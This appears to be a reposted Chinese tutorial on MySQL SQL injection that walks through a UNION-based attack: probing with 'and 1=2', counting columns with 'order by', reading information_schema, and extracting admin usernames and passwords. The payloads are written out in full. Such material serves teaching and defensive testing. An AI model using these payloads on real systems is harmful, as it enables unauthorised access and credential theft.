mysql数据库sql注入原理_SQL注入原理解析以及举例1
sql注入是指web應(yīng)用程序?qū)τ脩?hù)輸入數(shù)據(jù)的合法性沒(méi)有判斷,導(dǎo)致攻擊者可以構(gòu)造不同的sql語(yǔ)句來(lái)實(shí)現(xiàn)對(duì)數(shù)據(jù)庫(kù)的操作。
sql注入漏洞產(chǎn)生滿(mǎn)足條件:
1;用戶(hù)能夠控制數(shù)據(jù)的輸入。
2;原本需要執(zhí)行的代碼,拼接了用戶(hù)的輸入。
舉例:
攻擊流程:
1;判斷是否存在sql注入漏洞。
2;判斷網(wǎng)頁(yè)存在字段數(shù)。
3;判斷回顯點(diǎn)。
4;獲取信息。
測(cè)試開(kāi)始:
測(cè)試目標(biāo)獲取管理員賬號(hào)密碼
一;判斷是否存在sql注入漏洞。
1.1;構(gòu)建sql語(yǔ)句:?id=1 and 1=2 查看頁(yè)面是否正常。結(jié)果頁(yè)面顯示不正常。
注釋:因?yàn)閕d=1為真(可正常訪問(wèn)頁(yè)面),且1=2為假,所以and條件永遠(yuǎn)不會(huì)成立。對(duì)于web應(yīng)用不會(huì)返回結(jié)果給用戶(hù)。則攻擊者能看到的是一個(gè)錯(cuò)誤的界面或者頁(yè)面結(jié)果為空。當(dāng)然,如果攻擊者構(gòu)造的請(qǐng)求異常,也會(huì)導(dǎo)致頁(yè)面訪問(wèn)不正常。
1.2;構(gòu)建新的sql語(yǔ)句,確定是否存在語(yǔ)句邏輯錯(cuò)誤導(dǎo)致頁(yè)面不正常。?id=1 and 1=1 結(jié)果頁(yè)面正常,初步判斷存在sql漏洞。
注釋:1=1 為真,and條件語(yǔ)句成立。
二;判斷字段數(shù):
2.1;構(gòu)建sql語(yǔ)句:?id=1 and 1=1 order by 1 判斷網(wǎng)頁(yè)是否正常。?id=1 and 1=1 order by 2 判斷網(wǎng)頁(yè)是否正常。?id=1 and 1=1 order by 3 判斷網(wǎng)頁(yè)是否正常。結(jié)果:?id=1 and 1=1 order by 3 網(wǎng)頁(yè)顯示不正常,可以判斷字段數(shù)為2
注釋:order by 語(yǔ)句用來(lái)根據(jù)指定的列對(duì)結(jié)果集進(jìn)行排序。詳細(xì)請(qǐng)參考網(wǎng)址:http://www.w3school.com.cn/sql/sql_orderby.asp “order by 1”表示對(duì)第一欄位進(jìn)行排序,
三;判斷回顯點(diǎn):構(gòu)建sql語(yǔ)句:?id=1 and 1=2 union select 1,2 (之后的查詢(xún)結(jié)果將顯示在下圖紅框位置)
注釋:union 操作符用于合并兩個(gè)或多個(gè)select語(yǔ)句的結(jié)果集,union內(nèi)部的select語(yǔ)句必須擁有相同數(shù)量的列。詳細(xì)參考:http://www.w3school.com.cn/sql/sql_union.asp
四; 獲取信息
4.1;查看當(dāng)前數(shù)據(jù)庫(kù)名以及數(shù)據(jù)庫(kù)版本。構(gòu)建sql語(yǔ)句:?id=1 and 1=2 union select 1,database();?id=1 and 1=2 unio select 1, version()
注釋:union select 1 ,database(),其中數(shù)字1占一列,湊數(shù),用來(lái)滿(mǎn)足union定義。database():表示網(wǎng)站使用的數(shù)據(jù)庫(kù),version():表示當(dāng)前mysql的版本,usr():當(dāng)前mysql的用戶(hù)。
4.2;查詢(xún)當(dāng)前數(shù)據(jù)庫(kù)以及表名稱(chēng)。構(gòu)建sql語(yǔ)句:?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
注釋:information_schema數(shù)據(jù)庫(kù)用于存儲(chǔ)數(shù)據(jù)庫(kù)元數(shù)據(jù),例如:數(shù)據(jù)庫(kù)名,表名,列的數(shù)據(jù)類(lèi)型,訪問(wèn)權(quán)限等。tables用來(lái)存儲(chǔ)數(shù)據(jù)庫(kù)中的表的信息,包括表屬于哪個(gè)數(shù)據(jù)庫(kù),表的類(lèi)型,存儲(chǔ)引擎,創(chuàng)建時(shí)間等。table_schema和table_schema是表tables中的數(shù)據(jù)庫(kù)庫(kù)名和表名。limit 0,1 表示第一行顯示一行數(shù)據(jù)。limit 1,1表示第二行顯示一行數(shù)據(jù)。
4.3;查詢(xún)表admin中的字段名。查詢(xún)?nèi)齻€(gè)字段:ID username? password
構(gòu)建SQL語(yǔ)句:?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
構(gòu)建SQL語(yǔ)句:?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
構(gòu)建SQL語(yǔ)句:?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
注釋:columns表存儲(chǔ)表中的列的信息。其中包含數(shù)據(jù)庫(kù)庫(kù)名table_schema,表名table_name ,字段名column_name。
4.4;查詢(xún)用戶(hù)名稱(chēng):?id=1 and 1=2 union select 1,username from admin
4.5;查詢(xún)密碼:?id=1 and 1=2 union select 1,password from admin
總結(jié)
以上是生活随笔為你收集整理的mysql数据库sql注入原理_SQL注入原理解析以及举例1的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 第六套人民币什么时候发行的
- 下一篇: linux cmake编译源码,linu